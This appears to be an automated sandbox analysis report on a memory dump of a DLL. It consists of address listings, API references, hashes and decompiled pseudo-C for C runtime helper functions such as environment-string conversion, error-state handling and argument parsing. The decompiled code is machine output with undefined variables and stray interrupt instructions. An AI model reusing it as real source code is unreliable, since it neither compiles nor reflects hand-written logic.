0x6ea56f90
0x6ea56f92
0x6ea56f98
0x6ea56f9b
0x6ea56f9b
0x6ea56f9d
0x6ea56f9e
0x6ea56fa5
0x6ea56fa8
0x6ea56fac
0x6ea56fb9
0x6ea56fbe
0x6ea56fc3
0x6ea5703a
0x6ea5703b
0x6ea5703c
0x6ea5703d
0x6ea5703e
0x6ea5703f
0x6ea57044
0x6ea57048
0x6ea5704a
0x6ea5704b
0x6ea5704e
0x6ea5704e
0x6ea57051
0x6ea57051
0x6ea57053
0x6ea57054
0x6ea57058
0x6ea57059
0x6ea57060
0x6ea57063
0x6ea57068
0x6ea5706f
0x6ea57071
0x6ea57074
0x6ea5707e
0x6ea57081
0x6ea57084
0x6ea57098
0x6ea57098
0x6ea5709b
0x6ea570a5
0x6ea570aa
0x6ea570af
0x00000000
0x6ea570b1
0x6ea570b1
0x6ea570b6
0x6ea570bd
0x6ea570c2
0x6ea570d3
0x6ea570d5
0x6ea570d7
0x6ea570c4
0x6ea570c5
0x6ea570ca
0x6ea570cd
0x6ea570dc
0x6ea570e2
0x00000000
0x6ea570e5
0x6ea57086
0x6ea57086
0x6ea5708c
0x6ea57091
0x6ea57096
0x6ea570eb
0x6ea570ed
0x6ea570ee
0x6ea570ef
0x6ea570f0
0x6ea570f1
0x6ea570f2
0x6ea570f7
0x6ea570fa
0x6ea570fb
0x6ea570fd
0x6ea57103
0x6ea5710a
0x6ea5710d
0x6ea57110
0x6ea57111
0x6ea57114
0x6ea57115
0x6ea57118
0x6ea57139
0x6ea57120
0x6ea57124
0x6ea57137
0x00000000
0x6ea57137
0x00000000
0x6ea57124
0x6ea5713d
0x6ea57142
0x6ea5715b
0x6ea57160
0x6ea5716e
0x6ea5716e
0x6ea57167
0x6ea57167
0x6ea5716c
0x00000000
0x00000000
0x6ea5716c
0x6ea57178
0x6ea57179
0x6ea57182
0x6ea57190
0x6ea57195
0x6ea571aa
0x6ea571ac
0x6ea571b5
0x6ea571ec
0x6ea571f2
0x6ea571f9
0x6ea57212
0x6ea57212
0x6ea57213
0x6ea57219
0x6ea5721f
0x6ea57220
0x6ea57221
0x6ea57226
0x6ea5722b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea571fb
0x6ea571fb
0x6ea57203
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea57203
0x00000000
0x6ea5722d
0x6ea57235
0x6ea5723d
0x6ea5723d
0x6ea57245
0x6ea5724a
0x6ea57252
0x6ea57257
0x6ea5726b
0x6ea57270
0x6ea571b7
0x6ea571b7
0x6ea571b8
0x6ea571b9
0x6ea571ba
0x6ea571bb
0x6ea571c3
0x6ea571c3
0x6ea571c3
0x6ea571c8
0x6ea571cb
0x6ea571cb
0x6ea5714b
0x6ea5714b
0x6ea5714e
0x6ea5714f
0x6ea57150
0x6ea57151
0x6ea57156
0x6ea571d4
0x6ea571e3
0x00000000
0x00000000
0x00000000
0x6ea57096
0x6ea5706a
0x6ea5706c
0x6ea570e6
0x6ea570ea
0x6ea570ea
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea56fc5
0x6ea56fc5
0x6ea56fcb
0x6ea56fce
0x6ea56fd1
0x6ea56fd4
0x6ea56fd7
0x6ea56fda
0x6ea56fdd
0x00000000
0x6ea56f8e
0x6ea56f59
0x6ea56f59
0x6ea56f5c
0x6ea56fec
0x6ea56fed
0x6ea56ff2
0x00000000
0x6ea56ff2
0x6ea56ea3
0x6ea56ea3
0x6ea56ea6
0x6ea56eaf
0x6ea56eb2
0x6ea56eb8
0x6ea56ebb
0x6ea56ecf
0x6ea56ed2
0x6ea56ed3
0x6ea56ed4
0x6ea56ed6
0x6ea56edb
0x6ea56ebd
0x6ea56ebd
0x6ea56ec0
0x6ea56ec1
0x6ea56ec2
0x6ea56ec3
0x6ea56ec5
0x6ea56eca
0x6ea56eca
0x6ea56ede
0x6ea56ee3
0x00000000
0x00000000
0x6ea56ee5
0x6ea56eea
0x00000000
0x6ea56eec
0x6ea56eec
0x6ea56eef
0x00000000
0x6ea56eef
0x00000000
0x6ea56eea
0x6ea56f64
0x6ea56f67
0x6ea56ff3
0x6ea56ff8
0x6ea57004
0x6ea57008
0x6ea5700a
0x6ea5700d
0x6ea5700f
0x6ea57012
0x6ea57014
0x6ea57016
0x6ea5701b
0x6ea5701c
0x6ea57020
0x6ea57024
0x6ea57027
0x6ea57027
0x6ea5702b
0x00000000
0x6ea57032
0x6ea56e75
0x6ea56e75
0x6ea56e7c
0x6ea56e7d
0x6ea56e7f
0x6ea57033
0x6ea57039
0x6ea57039
0x00000000

APIs

_free.LIBCMT ref: 6EA56FED

Strings

., xrefs: 6EA571F2
*?, xrefs: 6EA56EA6

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: e5bfa105808f6d7b0cf0bc7c1212016d5e2fea3d1ba2796f60230dbf41088895
Instruction ID: 76a5368d773a380b3390b00d667be572a212e2fa979da78d3219bcc28bcf1b1c
Opcode Fuzzy Hash: e5bfa105808f6d7b0cf0bc7c1212016d5e2fea3d1ba2796f60230dbf41088895
Instruction Fuzzy Hash: 51616D76D142199FCB10CFD9C9805DDFBF9EF88314B28456AE814E7300E731AE918B94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA55986, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6EA55937,?,?,6EA558FF,?,00000001), ref: 6EA559A6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EA559B9
FreeLibrary.KERNEL32(00000000,?,?,?,6EA55937,?,?,6EA558FF,?,00000001), ref: 6EA559DC

Strings

CorExitProcess, xrefs: 6EA559B1
mscoree.dll, xrefs: 6EA5599F

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 294d0de6762d412cc0f38edf4e59359d3de7b4608cbe558808421ff17bd5bd02
Instruction ID: 01e4e4a21b2567e160d0662fd010820314cc6fa8f97a5bca2c11b443bf4896e8
Opcode Fuzzy Hash: 294d0de6762d412cc0f38edf4e59359d3de7b4608cbe558808421ff17bd5bd02
Instruction Fuzzy Hash: 35F03C30901708FBDF019FE0C849BAEBFB8FB45312F518165E805AA240CB348E91CA99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA57BBF, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E6EA57BBF() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E6EA57B88(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E6EA58C23(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E6EA56E13(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x6ea57bce
0x6ea57bd4
0x6ea57c2c
0x6ea57c2c
0x6ea57bd6
0x6ea57bd7
0x6ea57bdc
0x6ea57be5
0x6ea57beb
0x6ea57bf1
0x6ea57bf6
0x00000000
0x6ea57bf8
0x6ea57bfe
0x6ea57c03
0x6ea57c21
0x6ea57c1b
0x6ea57c1b
0x6ea57c1d
0x6ea57c1d
0x6ea57c24
0x6ea57c29
0x6ea57bf6
0x6ea57c30
0x6ea57c33
0x6ea57c33
0x6ea57c41

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6EA57BC8
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6EA57BEB

Part of subcall function 6EA58C23: HeapAlloc.KERNEL32(00000000,?,?,?,6EA576B7,00000220,?,?,?,?,?,?,6EA93E18,6EA55A68), ref: 6EA58C55

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6EA57C11
_free.LIBCMT ref: 6EA57C24
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EA57C33

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: e5a4119e9e99755fc02f858fc224d2dd669478cf1a500cdc9eb801c91b453f89
Instruction ID: 1635e1f069a0e71af945c97baece9c171d21ba204ea2460b8c843381e1b05a1c
Opcode Fuzzy Hash: e5a4119e9e99755fc02f858fc224d2dd669478cf1a500cdc9eb801c91b453f89
Instruction Fuzzy Hash: 5601D472601B167F27211AFA5C8CC7F7E6DDAC7AA03158529FC04E7380DA708C5289B4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA56955, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6EA56955(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t5;
				void* _t14;
				void* _t16;
				void* _t18;
				long _t19;

				_t14 = __ecx;
				_t19 = GetLastError();
				_t2 =  *0x6ea93044; // 0x4
				_t22 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6EA57F91(_t14, _t19, __eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t5 = E6EA56DB6(_t14, 1, 0x364);
						_pop(_t16);
						_t18 = _t5;
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6EA57F91(_t16, _t19, __eflags,  *0x6ea93044, _t18);
							if(__eflags != 0) {
								E6EA56605(_t19, _t18, 0x6ea9413c);
								E6EA56E13(0);
								goto L13;
							} else {
								E6EA57F91(_t16, _t19, __eflags,  *0x6ea93044, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							E6EA57F91(_t16, _t19, __eflags,  *0x6ea93044, 0);
							_push(0);
							L9:
							E6EA56E13();
							goto L3;
						}
					}
				} else {
					_t18 = E6EA57F3B(_t14, _t19, _t22, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6ea93044; // 0x4
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							__eflags = _t18;
							if(_t18 == 0) {
								goto L3;
							} else {
								SetLastError(_t19);
							}
						} else {
							L3:
							SetLastError(_t19);
							_t18 = 0;
						}
					}
				}
				return _t18;
			}

0x6ea56955
0x6ea56960
0x6ea56964
0x6ea56969
0x6ea5696c
0x6ea56993
0x6ea56996
0x6ea5699b
0x6ea5699d
0x00000000
0x6ea5699f
0x6ea569a6
0x6ea569ac
0x6ea569ad
0x6ea569af
0x6ea569b1
0x6ea569d4
0x6ea569d6
0x6ea569ed
0x6ea569f3
0x00000000
0x6ea569d8
0x6ea569df
0x6ea569e4
0x00000000
0x6ea569e4
0x6ea569b3
0x6ea569ba
0x6ea569bf
0x6ea569c0
0x6ea569c0
0x00000000
0x6ea569c5
0x6ea569b1
0x6ea5696e
0x6ea56974
0x6ea56978
0x6ea5698e
0x00000000
0x6ea5697a
0x6ea5697d
0x6ea569fb
0x6ea569fb
0x6ea569fd
0x00000000
0x6ea569ff
0x6ea56a00
0x6ea56a00
0x6ea5697f
0x6ea5697f
0x6ea56980
0x6ea56986
0x6ea56986
0x6ea5697d
0x6ea56978
0x6ea5698d

APIs

GetLastError.KERNEL32(?,?,90A7628E,6EA56DA8,6EA56E39,?,?,6EA56067), ref: 6EA5695A
SetLastError.KERNEL32(00000000,00000004,000000FF,?,90A7628E,6EA56DA8,6EA56E39,?,?,6EA56067), ref: 6EA56980
_free.LIBCMT ref: 6EA569C0
_free.LIBCMT ref: 6EA569F3
SetLastError.KERNEL32(00000000), ref: 6EA56A00

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 14f31c164c3fe7e5948bb6460339e663b264d566c71c68087cd2a6008f31bf13
Instruction ID: b45de6d9bc1449f1b147c1e2ba2bda4175b326fb5828f907441913867c184808
Opcode Fuzzy Hash: 14f31c164c3fe7e5948bb6460339e663b264d566c71c68087cd2a6008f31bf13
Instruction Fuzzy Hash: 2A110C72134B01FA9A0156F94E5898B36BD5BC373472A4524F568B63C0EF35CCF6802D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA56807, Relevance: 7.6, APIs: 5, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EA56807(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				long _t12;
				void* _t38;
				void* _t41;
				void* _t43;
				void* _t47;
				long _t48;
				long _t49;
				long _t53;
				long _t54;
				void* _t58;

				_t47 = __edx;
				_t41 = __ecx;
				_t38 = __ebx;
				_push(_t48);
				_t53 = GetLastError();
				_t2 =  *0x6ea93044; // 0x4
				_t60 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L5:
					_t3 = E6EA57F91(_t41, _t53, __eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L14;
					} else {
						_t48 = E6EA56DB6(_t41, 1, 0x364);
						_pop(_t41);
						__eflags = _t48;
						if(__eflags != 0) {
							__eflags = E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t48);
							if(__eflags != 0) {
								E6EA56605(_t53, _t48, 0x6ea9413c);
								E6EA56E13(0);
								_t58 = _t58 + 0xc;
								goto L12;
							} else {
								E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t30);
								_push(_t48);
								goto L8;
							}
						} else {
							E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t29);
							_push(_t48);
							L8:
							E6EA56E13();
							_pop(_t41);
							goto L14;
						}
					}
				} else {
					_t48 = E6EA57F3B(_t41, _t53, _t60, _t2);
					if(_t48 == 0) {
						_t2 =  *0x6ea93044; // 0x4
						goto L5;
					} else {
						if(_t48 != 0xffffffff) {
							L12:
							__eflags = _t48;
							if(_t48 == 0) {
								goto L14;
							} else {
								SetLastError(_t53);
								return _t48;
							}
						} else {
							L14:
							SetLastError(_t53);
							E6EA56438(_t38, _t41, _t47, _t48, _t53);
							asm("int3");
							_t5 =  *0x6ea93044; // 0x4
							_push(_t53);
							_t63 = _t5 - 0xffffffff;
							if(_t5 == 0xffffffff) {
								L20:
								_t6 = E6EA57F91(_t41, _t53, __eflags, _t5, 0xffffffff);
								__eflags = _t6;
								if(_t6 == 0) {
									goto L29;
								} else {
									_t53 = E6EA56DB6(_t41, 1, 0x364);
									_pop(_t41);
									__eflags = _t53;
									if(__eflags != 0) {
										__eflags = E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t53);
										if(__eflags != 0) {
											E6EA56605(_t53, _t53, 0x6ea9413c);
											E6EA56E13(0);
											_t58 = _t58 + 0xc;
											goto L27;
										} else {
											E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t21);
											_push(_t53);
											goto L23;
										}
									} else {
										E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t20);
										_push(_t53);
										L23:
										E6EA56E13();
										_pop(_t41);
										goto L29;
									}
								}
							} else {
								_t53 = E6EA57F3B(_t41, _t53, _t63, _t5);
								if(_t53 == 0) {
									_t5 =  *0x6ea93044; // 0x4
									goto L20;
								} else {
									if(_t53 != 0xffffffff) {
										L27:
										__eflags = _t53;
										if(_t53 == 0) {
											goto L29;
										} else {
											return _t53;
										}
									} else {
										L29:
										E6EA56438(_t38, _t41, _t47, _t48, _t53);
										asm("int3");
										_push(_t38);
										_push(_t53);
										_push(_t48);
										_t54 = GetLastError();
										_t9 =  *0x6ea93044; // 0x4
										_t66 = _t9 - 0xffffffff;
										if(_t9 == 0xffffffff) {
											L36:
											_t10 = E6EA57F91(_t41, _t54, __eflags, _t9, 0xffffffff);
											__eflags = _t10;
											if(_t10 == 0) {
												goto L33;
											} else {
												_t12 = E6EA56DB6(_t41, 1, 0x364);
												_pop(_t43);
												_t49 = _t12;
												__eflags = _t49;
												if(__eflags != 0) {
													__eflags = E6EA57F91(_t43, _t54, __eflags,  *0x6ea93044, _t49);
													if(__eflags != 0) {
														E6EA56605(_t54, _t49, 0x6ea9413c);
														E6EA56E13(0);
														goto L43;
													} else {
														E6EA57F91(_t43, _t54, __eflags,  *0x6ea93044, 0);
														_push(_t49);
														goto L39;
													}
												} else {
													E6EA57F91(_t43, _t54, __eflags,  *0x6ea93044, 0);
													_push(0);
													L39:
													E6EA56E13();
													goto L33;
												}
											}
										} else {
											_t49 = E6EA57F3B(_t41, _t54, _t66, _t9);
											if(_t49 == 0) {
												_t9 =  *0x6ea93044; // 0x4
												goto L36;
											} else {
												if(_t49 != 0xffffffff) {
													L43:
													__eflags = _t49;
													if(_t49 == 0) {
														goto L33;
													} else {
														SetLastError(_t54);
													}
												} else {
													L33:
													SetLastError(_t54);
													_t49 = 0;
												}
											}
										}
										return _t49;
									}
								}
							}
						}
					}
				}
			}

0x6ea56807
0x6ea56807
0x6ea56807
0x6ea5680a
0x6ea56811
0x6ea56813
0x6ea56818
0x6ea5681b
0x6ea56835
0x6ea56838
0x6ea5683d
0x6ea5683f
0x00000000
0x6ea56841
0x6ea5684d
0x6ea56850
0x6ea56851
0x6ea56853
0x6ea56876
0x6ea56878
0x6ea5688f
0x6ea56896
0x6ea5689b
0x00000000
0x6ea5687a
0x6ea56881
0x6ea56886
0x00000000
0x6ea56886
0x6ea56855
0x6ea5685c
0x6ea56861
0x6ea56862
0x6ea56862
0x6ea56867
0x00000000
0x6ea56867
0x6ea56853
0x6ea5681d
0x6ea56823
0x6ea56827
0x6ea56830
0x00000000
0x6ea56829
0x6ea5682c
0x6ea5689e
0x6ea5689e
0x6ea568a0
0x00000000
0x6ea568a2
0x6ea568a3
0x6ea568ad
0x6ea568ad
0x6ea5682e
0x6ea568ae
0x6ea568af
0x6ea568b5
0x6ea568ba
0x6ea568bb
0x6ea568c0
0x6ea568c1
0x6ea568c4
0x6ea568de
0x6ea568e1
0x6ea568e6
0x6ea568e8
0x00000000
0x6ea568ea
0x6ea568f6
0x6ea568f9
0x6ea568fa
0x6ea568fc
0x6ea5691f
0x6ea56921
0x6ea56938
0x6ea5693f
0x6ea56944
0x00000000
0x6ea56923
0x6ea5692a
0x6ea5692f
0x00000000
0x6ea5692f
0x6ea568fe
0x6ea56905
0x6ea5690a
0x6ea5690b
0x6ea5690b
0x6ea56910
0x00000000
0x6ea56910
0x6ea568fc
0x6ea568c6
0x6ea568cc
0x6ea568d0
0x6ea568d9
0x00000000
0x6ea568d2
0x6ea568d5
0x6ea56947
0x6ea56947
0x6ea56949
0x00000000
0x6ea5694b
0x6ea5694e
0x6ea5694e
0x6ea568d7
0x6ea5694f
0x6ea5694f
0x6ea56954
0x6ea56957
0x6ea56958
0x6ea56959
0x6ea56960
0x6ea56964
0x6ea56969
0x6ea5696c
0x6ea56993
0x6ea56996
0x6ea5699b
0x6ea5699d
0x00000000
0x6ea5699f
0x6ea569a6
0x6ea569ac
0x6ea569ad
0x6ea569af
0x6ea569b1
0x6ea569d4
0x6ea569d6
0x6ea569ed
0x6ea569f3
0x00000000
0x6ea569d8
0x6ea569df
0x6ea569e4
0x00000000
0x6ea569e4
0x6ea569b3
0x6ea569ba
0x6ea569bf
0x6ea569c0
0x6ea569c0
0x00000000
0x6ea569c5
0x6ea569b1
0x6ea5696e
0x6ea56974
0x6ea56978
0x6ea5698e
0x00000000
0x6ea5697a
0x6ea5697d
0x6ea569fb
0x6ea569fb
0x6ea569fd
0x00000000
0x6ea569ff
0x6ea56a00
0x6ea56a00
0x6ea5697f
0x6ea5697f
0x6ea56980
0x6ea56986
0x6ea56986
0x6ea5697d
0x6ea56978
0x6ea5698d
0x6ea5698d
0x6ea568d5
0x6ea568d0
0x6ea568c4
0x6ea5682c
0x6ea56827

APIs

GetLastError.KERNEL32(?,?,6EA5A35D,00000000,00000001,6EA589CF,?,6EA5A841,00000001,?,?,?,00000008,6EA58968,?,00000000), ref: 6EA5680B
_free.LIBCMT ref: 6EA56862
_free.LIBCMT ref: 6EA56896
SetLastError.KERNEL32(00000000,?,?,?,00000008,6EA58968,?,00000000,00000000,6EA922C0,0000002C,6EA589CF,?), ref: 6EA568A3
SetLastError.KERNEL32(00000000,00000004,000000FF,?,6EA5A841,00000001,?,?,?,00000008,6EA58968,?,00000000,00000000,6EA922C0,0000002C), ref: 6EA568AF

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 7b153303714e07559d64569982dda3a0971c96186f5cfb11e7445c3c7776274b
Instruction ID: 8194f12ecaf8893d71ef3772a18ce0d8fca694097d82b8a9ede4ded38d194901
Opcode Fuzzy Hash: 7b153303714e07559d64569982dda3a0971c96186f5cfb11e7445c3c7776274b
Instruction Fuzzy Hash: 5D11E931134A017ED94153E89F4C95B22AD5BC3634B264934F924B53C0EF348CF69128

Uniqueness

Uniqueness Score: -1.00%

Function 6EA5AC19, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA5AC19(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6ea936f0; // 0x6ea936e4
					if(_t23 != 0) {
						E6EA56E13(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6ea936f4; // 0x6ea94158
					if(_t24 != 0) {
						E6EA56E13(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6ea936f8; // 0x6ea94158
					if(_t25 != 0) {
						E6EA56E13(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6ea93720; // 0x6ea936e8
					if(_t26 != 0) {
						E6EA56E13(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6ea93724; // 0x6ea9415c
					if(_t27 != 0) {
						return E6EA56E13(_t6);
					}
				}
				return _t6;
			}

0x6ea5ac1f
0x6ea5ac24
0x6ea5ac28
0x6ea5ac2e
0x6ea5ac31
0x6ea5ac36
0x6ea5ac3a
0x6ea5ac40
0x6ea5ac43
0x6ea5ac48
0x6ea5ac4c
0x6ea5ac52
0x6ea5ac55
0x6ea5ac5a
0x6ea5ac5e
0x6ea5ac64
0x6ea5ac67
0x6ea5ac6c
0x6ea5ac6d
0x6ea5ac70
0x6ea5ac76
0x00000000
0x6ea5ac7e
0x6ea5ac76
0x6ea5ac81

APIs

_free.LIBCMT ref: 6EA5AC31

Part of subcall function 6EA56E13: HeapFree.KERNEL32(00000000,00000000,?,6EA56067), ref: 6EA56E29
Part of subcall function 6EA56E13: GetLastError.KERNEL32(?,?,6EA56067), ref: 6EA56E3B

_free.LIBCMT ref: 6EA5AC43
_free.LIBCMT ref: 6EA5AC55
_free.LIBCMT ref: 6EA5AC67
_free.LIBCMT ref: 6EA5AC79

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8c3709c2ec497e7670eb02ef3014753a1fdbf5a93087192479f430a4d13b1e43
Instruction ID: 0f16a93cdd08df27f082e82e88731e43d43f7d659be3d28801bfb4048dff2dee
Opcode Fuzzy Hash: 8c3709c2ec497e7670eb02ef3014753a1fdbf5a93087192479f430a4d13b1e43
Instruction Fuzzy Hash: 05F04F31A11A15978A50DAD8E285D5B7BEEBB453507644C49F4ACEB700CB34FCE18AF8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA55A2A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6EA55A2A(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				CHAR* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t40;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t54;
				intOrPtr* _t58;
				void* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t66;

				_t48 = _a4;
				if(_t48 != 0) {
					if(_t48 == 2 || _t48 == 1) {
						_push(_t59);
						E6EA57828(_t59);
						GetModuleFileNameA(0, 0x6ea93b88, 0x104);
						_t26 =  *0x6ea93e30; // 0xf732a8
						 *0x6ea93e38 = 0x6ea93b88;
						_v20 = _t26;
						if(_t26 == 0 ||  *_t26 == 0) {
							_t26 = 0x6ea93b88;
							_v20 = 0x6ea93b88;
						}
						_v8 = 0;
						_v16 = 0;
						E6EA55B60( &_v8, _t26, 0, 0,  &_v8,  &_v16);
						_t64 = E6EA55CD4(_v8, _v16, 1);
						if(_t64 != 0) {
							E6EA55B60( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
							if(_t48 != 1) {
								_v12 = 0;
								_push( &_v12);
								_t49 = E6EA572FF(_t48, 0, _t64, _t64);
								if(_t49 == 0) {
									_t58 = _v12;
									_t54 = 0;
									_t36 = _t58;
									if( *_t58 == 0) {
										L17:
										_t37 = 0;
										 *0x6ea93e24 = _t54;
										_v12 = 0;
										_t49 = 0;
										 *0x6ea93e28 = _t58;
										L18:
										E6EA56E13(_t37);
										_v12 = 0;
										goto L19;
									} else {
										goto L16;
									}
									do {
										L16:
										_t36 = _t36 + 4;
										_t54 =  &(_t54->i);
									} while ( *_t36 != 0);
									goto L17;
								}
								_t37 = _v12;
								goto L18;
							}
							 *0x6ea93e24 = _v8 - 1;
							_t43 = _t64;
							_t64 = 0;
							 *0x6ea93e28 = _t43;
							goto L12;
						} else {
							_t44 = E6EA56DA3();
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							L12:
							_t49 = 0;
							L19:
							E6EA56E13(_t64);
							_t40 = _t49;
							goto L20;
						}
					} else {
						_t45 = E6EA56DA3();
						_t66 = 0x16;
						 *_t45 = _t66;
						E6EA56CE6();
						_t40 = _t66;
						L20:
						return _t40;
					}
				}
				return 0;
			}

0x6ea55a33
0x6ea55a38
0x6ea55a45
0x6ea55a62
0x6ea55a63
0x6ea55a76
0x6ea55a7c
0x6ea55a81
0x6ea55a87
0x6ea55a8c
0x6ea55a93
0x6ea55a95
0x6ea55a95
0x6ea55a9b
0x6ea55aa2
0x6ea55aa9
0x6ea55abb
0x6ea55ac2
0x6ea55ae3
0x6ea55aee
